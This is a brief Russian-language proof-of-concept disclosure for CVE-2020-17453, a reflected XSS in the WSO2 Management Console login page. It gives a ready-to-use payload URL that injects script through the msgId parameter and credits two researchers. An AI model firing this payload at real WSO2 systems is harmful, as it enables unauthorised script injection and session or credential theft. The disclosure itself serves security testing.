
PoC (проверка концепции) - CVE-2020-17453
CVE-2020-17453
WSO2 Management Console до версии 5.10 допускает XSS через параметр msgId в carbon/admin/login.jsp.

https://<company>.com/carbon/admin/login.jsp?msgId=%27;alert(1)//
Имя: Jackson Henry
Twitter: @JacksonHHax
Имя: Nicholas Young